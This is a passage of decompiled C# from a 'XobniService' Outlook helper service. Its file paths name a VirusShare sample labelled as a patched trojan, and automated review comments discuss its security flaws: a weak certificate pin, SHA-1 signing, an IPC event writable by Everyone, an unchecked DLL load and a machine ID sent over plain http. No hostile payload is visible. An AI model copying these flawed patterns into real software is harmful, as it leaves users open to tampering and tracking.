ady.a(Level.Debug, "Could not access update check URL: " + ex.Message);
return (aaa) null;
}
if (response.ContentLength == 0L)
{
ady.a(Level.Debug, "No updates available");
return (aaa) null;
}
XmlDocument xmlDocument;
using (Stream responseStream = response.GetResponseStream())
xmlDocument = hs.b(responseStream);
XmlElement documentElement = xmlDocument.DocumentElement;
string[] strArray1 = hs.a(documentElement, "version").InnerText.Split('.');
string str1 = strArray1[2];
int A_0_1 = int.Parse(strArray1[3]);
string[] strArray2 = fileVersion.Split('.');
string str2 = strArray2[2];
if (int.Parse(strArray2[3]) >= A_0_1)
{
ady.a(Level.Debug, "No new updates");
return (aaa) null;
}
if (string.IsNullOrEmpty(str1))
throw new Exception("Invalid branch ID in update");
if (str1.Equals(str2))
{
ady.a(Level.Debug, string.Format("Updating {0} branch", (object) str2));
}
else
{
if (!"0".Equals(str2))
throw new Exception("Invalid branch ID in update");
ady.a(Level.Debug, "Updating unknown branch to release branch");
}
string innerText1 = hs.a(documentElement, "url").InnerText;
string innerText2 = hs.a(documentElement, "hash").InnerText;
string innerText3 = hs.a(documentElement, "localName").InnerText;
return new aaa(A_0_1, innerText1, innerText3, innerText2);
}
private static void a(aaa A_0) => ady.a(Level.Debug, "Update available: Hash(" + A_0.d() + "), BuildNumber(" + (object) A_0.a() + "), LocalName(" + A_0.b() + "), URL(" + A_0.c() + ")");
public static XmlDocument b(Stream A_0)
{
X509Certificate2 A_0_1 = new X509Certificate2(hs.a(A_0));
if (!hs.a(A_0_1))
throw new Exception("Invalid XobniUpdater certificate");
byte[] signature = hs.a(A_0);
byte[] buffer = hs.a(A_0);
if (!((RSACryptoServiceProvider) A_0_1.PublicKey.Key).VerifyData(buffer, (object) new SHA1CryptoServiceProvider(), signature))
throw new Exception("Invalid XobniUpdater signature");
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load((Stream) new MemoryStream(buffer));
return xmlDocument;
}
public static void a(Stream A_0, X509Certificate2 A_1, byte[] A_2)
{
X509Certificate2 A_0_1 = new X509Certificate2((X509Certificate) A_1);
if (!hs.a(A_0_1))
throw new ArgumentException("Invalid XobniUpdate certificate");
byte[] A_1_1 = ((RSACryptoServiceProvider) A_0_1.PrivateKey).SignData(A_2, (object) new SHA1CryptoServiceProvider());
A_0_1.PrivateKey = (AsymmetricAlgorithm) null;
hs.b(A_0, A_0_1.RawData);
hs.b(A_0, A_1_1);
hs.b(A_0, A_2);
}
public static bool a(X509Certificate2 A_0)
{
X509Chain x509Chain = new X509Chain();
x509Chain.ChainPolicy.ExtraStore.Add(hs.g);
x509Chain.ChainPolicy.VerificationFlags = X509VerificationFlags.AllowUnknownCertificateAuthority | X509VerificationFlags.IgnoreEndRevocationUnknown | X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown | X509VerificationFlags.IgnoreRootRevocationUnknown;
return x509Chain.Build(A_0) && x509Chain.ChainElements.Count == 2 && x509Chain.ChainElements[0].Certificate.Subject.Equals("E=support@xobni.com, CN=XobniUpdate, O=Xobni Corporation, S=CA, C=US") && x509Chain.ChainElements[1].Certificate.Equals((X509Certificate) hs.g);
}
public static XmlElement a(XmlElement A_0, string A_1)
{
XmlNodeList elementsByTagName = A_0.GetElementsByTagName(A_1);
return elementsByTagName.Count == 1 ? elementsByTagName[0] as XmlElement : throw new Exception("Invalid XobniUpdater XML: expected single element");
}
public static byte[] a(Stream A_0)
{
byte[] A_1_1 = new byte[2];
hs.a(A_0, A_1_1);
byte[] A_1_2 = new byte[(int) BitConverter.ToUInt16(A_1_1, 0)];
hs.a(A_0, A_1_2);
return A_1_2;
}
public static void b(Stream A_0, byte[] A_1)
{
byte[] buffer = A_1.Length <= (int) ushort.MaxValue ? BitConverter.GetBytes((ushort) A_1.Length) : throw new ArgumentException("Data length can't be more than " + (object) ushort.MaxValue + " bytes");
A_0.Write(buffer, 0, buffer.Length);
A_0.Write(A_1, 0, A_1.Length);
}
public static void a(Stream A_0, byte[] A_1)
{
int offset = 0;
int length = A_1.Length;
while (length > 0)
{
int num = A_0.Read(A_1, offset, length);
if (num <= 0)
throw new EndOfStreamException(string.Format("End of stream reached with {0} bytes left to read", (object) length));
length -= num;
offset += num;
}
}
public static void a(Stream A_0, Stream A_1)
{
int count1 = 4096;
byte[] buffer = new byte[count1];
for (int count2 = A_0.Read(buffer, 0, count1); count2 > 0; count2 = A_0.Read(buffer, 0, count1))
A_1.Write(buffer, 0, count2);
}
public static string a(byte[] A_0)
{
char[] chArray = new char[A_0.Length * 2];
for (int index = 0; index < A_0.Length; ++index)
{
int num = (int) A_0[index];
chArray[index * 2] = hs.h[num >> 4];
chArray[index * 2 + 1] = hs.h[num & 15];
}
return new string(chArray);
}
public static bool a(string A_0, string A_1)
{
byte[] hash;
using (FileStream inputStream = new FileStream(A_0, FileMode.Open))
hash = new SHA256Managed().ComputeHash((Stream) inputStream);
return A_1.ToUpper().Equals(hs.a(hash));
}
public static string a(string A_0)
{
byte[] hash;
using (FileStream inputStream = new FileStream(A_0, FileMode.Open))
hash = new SHA256Managed().ComputeHash((Stream) inputStream);
return hs.a(hash);
}
}
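Review bot: The trust-anchor pin in `a(X509Certificate2 A_0)` relies on `Certificate.Equals((X509Certificate) hs.g)`, which .NET Framework documents as comparing issuer and serial number only, and the leaf is identified by a `Subject` string comparison. Because `AllowUnknownCertificateAuthority` is set, the chain engine itself does not require a trusted root, so this comparison is the only thing binding the chain to the embedded CA and it should cover the whole certificate: `x509Chain.ChainElements[1].Certificate.Thumbprint == hs.g.Thumbprint` (or a `RawData` byte comparison). The manifest signature in `b(Stream A_0)` is verified with `SHA1CryptoServiceProvider`; moving signer and verifier to SHA-256 would match the SHA-256 already used for the payload hash. Also worth a comment: `b()` leaves `hs.f` null when the `Software\Xobni` key is absent, because the default `hs.e` is applied only through `GetValue` or the catch.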
@@ -0,0 +1,40 @@
// Decompiled with JetBrains decompiler
// Type: jf
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Runtime.CompilerServices;
internal static class jf
{
private static string a;
[SpecialName]
public static Guid b()
{
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
return new Guid((string) registryKey.GetValue("XMID", (object) string.Empty));
}
}
catch
{
}
return Guid.Empty;
}
[SpecialName]
public static string a()
{
if (jf.a != null)
return jf.a;
jf.a = jf.b().ToString("N").ToUpperInvariant();
return jf.a;
}
}
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: ks
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[CompilerGenerated]
internal class ks
{
internal static ks.a a;
[StructLayout(LayoutKind.Explicit, Size = 32, Pack = 1)]
private struct a
{
}
}
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: l9
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.IO;
using XobniLogging;
internal static class l9
{
internal static void c()
{
try
{
try
{
ady.a(Level.Debug, "CheckForRegisteredShim started");
if (l9.b())
return;
ady.a(Level.Debug, "Need to re-register Shim");
l9.a();
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level Check Shim", ex);
}
finally
{
ady.a(Level.Debug, "Finished Check Shim");
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer catch block of Check Shim", ex);
}
}
private static bool b()
{
try
{
return l9.a(Registry.ClassesRoot, "XobniMainConnectorShim.Connect\\", string.Empty, "Connect Class") && l9.a(Registry.ClassesRoot, "XobniMainConnectorShim.Connect\\CLSID\\", string.Empty, "{79a399f3-daa1-46c8-ab92-27c7cbe43251}") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\", string.Empty, "XobniMainConnectorShim.Connect") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\ProgID\\", string.Empty, "XobniMainConnectorShim.Connect") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\InprocServer32\\", "ThreadingModel", "Apartment") && l9.a(Registry.LocalMachine, "SOFTWARE\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect\\", "Description", "Xobni") && l9.a(Registry.LocalMachine, "SOFTWARE\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect\\", "FriendlyName", "Xobni");
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't check Shim reg values", ex);
return false;
}
}
public static string a(RegistryKey A_0, string A_1, string A_2)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey(A_1, false))
return registryKey == null ? (string) null : registryKey.GetValue(A_2, (object) null) as string;
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("Couldn't get {0} registry value for {1} {2}", (object) A_0, (object) A_1, (object) A_2), ex);
return (string) null;
}
}
private static bool a(RegistryKey A_0, string A_1, string A_2, string A_3)
{
try
{
string str = l9.a(A_0, A_1, A_2);
if (string.IsNullOrEmpty(str) && !string.IsNullOrEmpty(A_3))
{
ady.a(Level.Debug, string.Format("Couldn't find registry key {0} {1} {2}", (object) A_0, (object) A_1, (object) A_2));
return false;
}
if (A_3.Equals(str))
return true;
ady.a(Level.Debug, string.Format("Registry key {0} {1} {2} has wrong value: {3}", (object) A_0, (object) A_1, (object) A_2, (object) str));
return false;
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't read registry value", ex);
return false;
}
}
private static void a()
{
try
{
ady.a(Level.Debug, "Re-Registering Shim");
string path1 = gs.a();
ady.a(Level.Debug, string.Format("Installation path is {0}", (object) path1));
string str = Path.Combine(path1, "XobniMainConnectorShim.dll");
ady.a(Level.Debug, "XobniMainConnectorShim path is " + str);
if (!File.Exists(str))
throw new Exception("XobniMainConnectorShim doesn't exist or path is incorrect");
eh.b(str);
}
catch (Exception ex)
{
ady.a(Level.Exception, "XobniMainConnectorShim", ex);
}
}
}
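Review bot: The check in `b()` validates the ProgID, CLSID and `ThreadingModel` values but never reads the default value of `CLSID\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\InprocServer32\`, which is the value that names the DLL actually loaded for this class. A registration that points at a different file therefore passes as healthy and `a()` is never asked to re-register. Comparing that default value, read with the existing `l9.a(Registry.ClassesRoot, ..., string.Empty)` helper, against `Path.Combine(gs.a(), "XobniMainConnectorShim.dll")` case-insensitively as one more `&&` term would close the gap. `a()` should also guard against `gs.a()` returning null before `Path.Combine`, otherwise the log shows an `ArgumentNullException` rather than a missing-install-path message.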
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: lo
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.IO;
using System.Threading;
using XobniLogging;
internal class lo
{
private lq a;
private lq b;
internal lo()
{
this.a = new lq("Global\\XobniRegSvrSpecialRequest", EventResetMode.AutoReset);
this.b = new lq("Global\\XobniRegSvrSpecialResponse", EventResetMode.ManualReset);
}
internal void b() => this.a.a(new q8(this.a));
internal void c()
{
this.a.f();
this.b.f();
}
private void a()
{
try
{
ady.a(Level.Debug, "Received request to register redemption");
string path1 = gs.a();
ady.a(Level.Debug, "Installation path is " + path1);
string str = Path.Combine(path1, "XobniRdo.dll");
ady.a(Level.Debug, "XobniRdo path is " + str);
if (!File.Exists(str))
throw new Exception("XobniRdo doesn't exist or path is incorrect");
eh.b(str);
this.b.c();
}
catch (Exception ex)
{
ady.a(Level.Exception, "RegisterRedemptionRequest", ex);
}
}
}
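Review bot: Nothing in the private `a()` handler checks `XobniRdo.dll` beyond `File.Exists` before `eh.b(str)` loads it into the process and calls its export, and the directory comes from the `InstallDir` registry value via `gs.a()`. The trigger is a `Global\` named event, so the safety of this path rests on who may signal that event and who may write to the install directory; neither assumption is stated. I would add a comment above the `eh.b(str)` call such as `// Loads XobniRdo.dll in-process: InstallDir must be writable by administrators only`, and guard `path1 == null` before `Path.Combine`. On any failure the response event `this.b.c()` is never set, so the requester cannot tell failure from delay.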
@@ -0,0 +1,134 @@
// Decompiled with JetBrains decompiler
// Type: lq
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Security.AccessControl;
using System.Threading;
using XobniLogging;
public class lq : IDisposable
{
private const string a = "XobniIpcEvent";
private readonly string b;
private readonly EventResetMode c = EventResetMode.ManualReset;
private EventWaitHandle d;
private bool e;
private bool f;
private readonly object g = new object();
public lq(string A_0, EventResetMode A_1)
{
this.b = A_0;
this.c = A_1;
this.b();
}
public void c() => this.d.Set();
public void d() => this.d.Reset();
public void g() => this.d.Close();
public bool a(TimeSpan A_0) => this.d.WaitOne(A_0, false);
public void a(q8 A_0)
{
lock (this.g)
{
if (this.f)
return;
this.f = true;
}
new Thread(new ParameterizedThreadStart(this.a))
{
Name = (this.b + "WaitThread"),
IsBackground = true
}.Start((object) A_0);
}
private void a(object A_0)
{
try
{
q8 q8 = (q8) A_0;
try
{
while (!this.e)
{
if (this.d.WaitOne(TimeSpan.FromSeconds(1.0), false))
q8();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "IpcEventWait", ex);
}
}
finally
{
lock (this.g)
this.f = false;
}
}
private void b()
{
try
{
this.d = EventWaitHandle.OpenExisting(this.b);
}
catch (WaitHandleCannotBeOpenedException ex)
{
this.a();
}
}
private void a()
{
EventWaitHandleSecurity eventSecurity = new EventWaitHandleSecurity();
EventWaitHandleAccessRule rule = new EventWaitHandleAccessRule("Everyone", EventWaitHandleRights.Modify | EventWaitHandleRights.Synchronize, AccessControlType.Allow);
eventSecurity.AddAccessRule(rule);
bool createdNew;
this.d = new EventWaitHandle(false, this.c, this.b, out createdNew, eventSecurity);
}
public void a(bool A_0)
{
this.e = true;
if (!A_0)
return;
this.g();
}
public void f()
{
try
{
this.a(true);
}
finally
{
GC.SuppressFinalize((object) this);
}
}
void object.e()
{
try
{
this.a(false);
}
catch (Exception ex)
{
ady.a(Level.Exception, "IpcEventFinalizer", ex);
}
finally
{
// ISSUE: explicit finalizer call
this.Finalize();
}
}
}
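Review bot: The access rule in the private `a()` grants `Modify | Synchronize` to the account name "Everyone", and `b()` adopts any pre-existing object of the same name through `EventWaitHandle.OpenExisting` without checking its owner or ACL. The name is resolved as a localized account name, so rule creation can fail on non-English Windows; a well-known SID avoids that: `new SecurityIdentifier(WellKnownSidType.WorldSid, null)` (needs `System.Security.Principal`), or preferably a narrower principal, with `Modify` granted only to the processes that must signal. `createdNew` is ignored, so the class cannot tell whether it created the event with its own ACL or raced with another creator. The `e` flag read by the wait loop is written from another thread without `volatile` or a lock.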
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: o4
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Net;
using XobniLogging;
internal static class o4
{
private const int a = 3;
private const string b = "LoadBehavior";
private const string c = "XobniDisable";
private const string d = "SoftDisableWatcher";
private const string e = "Software\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect";
private static readonly string f = "http://client." + u5.a() + "/recordping?pingType=resetLoadBehavior&xmid={0}";
internal static void a(bool? A_0)
{
try
{
if (A_0.GetValueOrDefault(false))
return;
using (RegistryKey A_0_1 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect", true))
{
if (!o4.a(A_0_1))
return;
A_0_1.SetValue("LoadBehavior", (object) 3);
if (!rx.e())
return;
o4.a();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Exception checking soft disable", ex);
}
}
private static bool a(RegistryKey A_0)
{
if (A_0 == null || A_0.GetValue("XobniDisable", (object) null) != null)
return false;
int? nullable1 = gs.a<int>(A_0.GetValue("LoadBehavior"));
if (!nullable1.HasValue)
return false;
int? nullable2 = nullable1;
return (nullable2.GetValueOrDefault() != 3 ? 0 : (nullable2.HasValue ? 1 : 0)) == 0;
}
private static void a()
{
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(string.Format(o4.f, (object) jf.a()));
httpWebRequest.KeepAlive = false;
try
{
httpWebRequest.GetResponse();
}
catch (WebException ex)
{
ady.a(Level.Debug, "Could not ping disable Url: " + ex.Message);
}
}
}
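Review bot: The `WebResponse` returned by `httpWebRequest.GetResponse()` in the private `a()` is never closed, which holds the connection until finalization; `using (httpWebRequest.GetResponse()) { }` releases it. The request URL built from `o4.f` is plain `http://` and carries the machine identifier from `jf.a()`, so the identifier travels in cleartext; if the endpoint supports TLS the scheme should be `https://`. In `a(bool? A_0)` the `LoadBehavior` value is rewritten to 3 whenever it differs and `XobniDisable` is absent, with no log entry; an `ady.a(Level.Debug, ...)` line recording the previous value would make the change auditable.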
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: p3
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System.Runtime.CompilerServices;
internal static class p3
{
private static string a = string.Empty;
[SpecialName]
public static string a()
{
if (p3.a == null || string.Empty.Equals(p3.a))
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
{
if (registryKey.GetValue("XIID", (object) string.Empty) is string str)
p3.a = str;
}
}
}
return p3.a;
}
}
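Review bot: The cache test `p3.a == null || string.Empty.Equals(p3.a)` in `a()` can be written as `string.IsNullOrEmpty(p3.a)`. Because an absent key or a non-string value leaves the field empty, `Software\Xobni` under HKCU is reopened on every call in that case; a comment such as `// not cached when missing: XIID is re-read until a value appears` would state that this is intended. The static field is read and written without synchronization, which looks harmless for an idempotent string but is worth a remark if callers run on several threads.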
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: q8
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
public delegate void q8();
@@ -0,0 +1,163 @@
// Decompiled with JetBrains decompiler
// Type: rx
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using GroupPolicy;
using Microsoft.Win32;
using System;
using XobniLogging;
public static class rx
{
private const string a = "GroupPolicyPreferences";
private const string b = "Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences";
private const string c = "auto_updates_on";
private const string d = "ceip_on";
private const string e = "linked_in_on";
private const string f = "skype_on";
private const string g = "yahoo_on";
private const string h = "web_widgets_on";
private const string i = "phone_home_on";
private const string j = "xobni_on";
private const string k = "web_search_on";
private const string l = "data_files_dir";
private const string m = "bottom_web_search_on";
public static bool g()
{
try
{
return rx.d("auto_updates_on").GetValueOrDefault(true);
}
catch (Exception ex)
{
try
{
ady.a(Level.Exception, "AutoUpdates Group Policy", ex);
}
catch
{
}
return true;
}
}
public static bool f(bool A_0) => rx.b("ceip_on").GetValueOrDefault(A_0);
public static bool e(bool A_0) => rx.b("linked_in_on").GetValueOrDefault(A_0);
public static bool d(bool A_0) => rx.b("skype_on").GetValueOrDefault(A_0);
public static bool c(bool A_0) => rx.b("yahoo_on").GetValueOrDefault(A_0);
public static bool b(bool A_0) => rx.b("web_widgets_on").GetValueOrDefault(A_0);
public static bool f() => rx.b("linked_in_on").GetValueOrDefault(true);
public static bool a(bool A_0) => rx.b("web_search_on").GetValueOrDefault(A_0);
public static bool e() => rx.b("phone_home_on").GetValueOrDefault(true);
public static bool d() => rx.b("xobni_on").GetValueOrDefault(true);
public static bool c() => rx.b("data_files_dir").GetValueOrDefault(true);
public static bool b() => rx.b("bottom_web_search_on").GetValueOrDefault(true);
public static string a() => rx.c() ? rx.a("data_files_dir") : string.Empty;
private static bool? d(string A_0) => rx.d(Registry.LocalMachine, A_0);
private static bool? c(string A_0) => rx.d(Registry.CurrentUser, A_0);
private static bool? b(string A_0)
{
PolicySetting policySetting = rx.c(Registry.LocalMachine, A_0);
return policySetting != PolicySetting.NotConfigured ? new bool?(policySetting == PolicySetting.On) : rx.c(A_0);
}
private static string a(string A_0)
{
string str = rx.a(Registry.LocalMachine, A_0);
if (string.IsNullOrEmpty(str))
str = rx.a(Registry.CurrentUser, A_0);
return str;
}
private static bool? d(RegistryKey A_0, string A_1)
{
try
{
switch (rx.c(A_0, A_1))
{
case PolicySetting.Off:
return new bool?(false);
case PolicySetting.On:
return new bool?(true);
case PolicySetting.NotConfigured:
return new bool?();
default:
throw new ApplicationException(string.Format("Bad Policy setting for {0}", (object) A_1));
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "CalculatePolicySetting", ex);
return new bool?();
}
}
private static PolicySetting c(RegistryKey A_0, string A_1)
{
try
{
int? nullable = rx.b(A_0, A_1);
if (!nullable.HasValue)
return PolicySetting.NotConfigured;
switch (nullable.Value)
{
case 0:
return PolicySetting.Off;
case 1:
return PolicySetting.On;
default:
throw new ApplicationException(string.Format("Bad Policy Value {0}", (object) A_1));
}
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("CheckRegistryValue {0}", (object) A_1), ex);
return PolicySetting.NotConfigured;
}
}
private static int? b(RegistryKey A_0, string A_1)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey("Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences", false))
return registryKey == null ? new int?() : (int?) registryKey.GetValue(A_1, (object) null);
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("GetRegistryValue {0}", (object) A_1), ex);
return new int?();
}
}
private static string a(RegistryKey A_0, string A_1)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey("Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences", false))
return registryKey == null ? (string) null : registryKey.GetValue(A_1, (object) null) as string;
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("GetRegistryStringValue {0}", (object) A_1), ex);
return (string) null;
}
}
}
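Review bot: In `b(RegistryKey, string)` the cast `(int?) registryKey.GetValue(A_1, (object) null)` throws InvalidCastException for any value that is not a boxed Int32, and `c()` sends `data_files_dir` through exactly that path although `a(string)` reads the same name as a string. Each such call ends in the catch block, reports through `ady.a(Level.Exception, ...)`, and then resolves to the default `true`. Reading the value as `registryKey.GetValue(A_1, (object) null) as int?` would yield an empty result for non-integer data without throwing. Separately, `c(RegistryKey, string)` converts an out-of-range value into `PolicySetting.NotConfigured`, so a malformed HKLM entry for a gate such as `phone_home_on` lets `b(string)` fall through to HKCU and then to `true`; a distinct result for invalid data, or a comment stating that this fail-open precedence is intended, would make the policy handling auditable.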
@@ -0,0 +1,47 @@
// Decompiled with JetBrains decompiler
// Type: u5
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Runtime.CompilerServices;
internal static class u5
{
private const string a = "Software\\Xobni\\Settings";
private static string b;
[SpecialName]
public static string a()
{
if (u5.b != null)
return u5.b;
try
{
u5.b = u5.a("XobniDomain");
if (u5.b != null)
return u5.b;
}
catch (Exception ex)
{
}
u5.b = "xobni.com";
return u5.b;
}
[SpecialName]
public static void b(string A_0) => u5.b = A_0;
private static string a(string A_0)
{
using (RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
{
if (registryKey1 != null)
return registryKey1.GetValue(A_0, (object) null) as string;
using (RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
return registryKey2 == null ? (string) null : registryKey2.GetValue(A_0, (object) null) as string;
}
}
}
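Review bot: The fallback in `a(string)` reopens the key it has just failed to open: both `OpenSubKey` calls target `Registry.LocalMachine` with `"Software\\Xobni\\Settings"`, so the inner `using` can be expected to see `null` again. If a per-user override was intended, the second lookup needs a different hive (presumably `Registry.CurrentUser`, to be confirmed against the original source); otherwise the inner block can be removed. The empty `catch (Exception ex)` in `a()` also hides registry failures before defaulting to `"xobni.com"`; since `o4` builds an outbound `http://client.` URL from this value, the catch should log the failure, and a comment should say who is expected to write `XobniDomain`.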
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: uj
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.ServiceProcess;
internal static class uj
{
private static void a() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new x()
});
}
@@ -0,0 +1,206 @@
// Decompiled with JetBrains decompiler
// Type: x
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Collections.Generic;
using System.Runtime.CompilerServices;
using System.ServiceProcess;
using System.Threading;
using XobniLogging;
public class x : ServiceBase
{
private static bool a;
private static readonly object b = new object();
private static readonly TimeSpan c = TimeSpan.FromSeconds(5.0);
private static readonly TimeSpan d = TimeSpan.FromSeconds(30.0);
private static readonly TimeSpan e = TimeSpan.FromHours(1.0);
private static Thread f;
private lo g;
public x() => this.e();
private void e() => this.ServiceName = "XobniService";
void ServiceBase.a(string[] A_0)
{
try
{
try
{
lock (x.b)
{
if (x.a)
return;
x.a = true;
try
{
if (this.g == null)
{
this.g = new lo();
this.g.b();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "RedemptionListenerStart", ex);
}
x.f = new Thread(new ThreadStart(x.d));
x.f.Start();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnStart", ex);
}
}
catch
{
}
}
void ServiceBase.f()
{
try
{
try
{
lock (x.b)
{
if (!x.a)
return;
x.a = false;
try
{
if (this.g != null)
{
this.g.c();
this.g = (lo) null;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "RedemptionListenerStop", ex);
}
x.f.Interrupt();
Monitor.Wait(x.b);
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnStop", ex);
}
}
catch
{
}
}
private static void d()
{
try
{
TimeSpan d = x.d;
TimeSpan timeSpan = TimeSpan.Zero;
while (true)
{
try
{
List<x.a> aList;
do
{
try
{
Thread.Sleep(x.c);
}
catch (ThreadInterruptedException ex)
{
}
lock (x.b)
{
if (!x.a)
{
Monitor.PulseAll(x.b);
return;
}
}
d -= x.c;
timeSpan -= x.c;
aList = new List<x.a>();
if (timeSpan <= TimeSpan.Zero)
{
timeSpan = x.e;
aList.Add(new x.a(x.a));
}
if (d <= TimeSpan.Zero)
{
d = x.d;
aList.Add(new x.a(x.b));
}
}
while (aList.Count == 0);
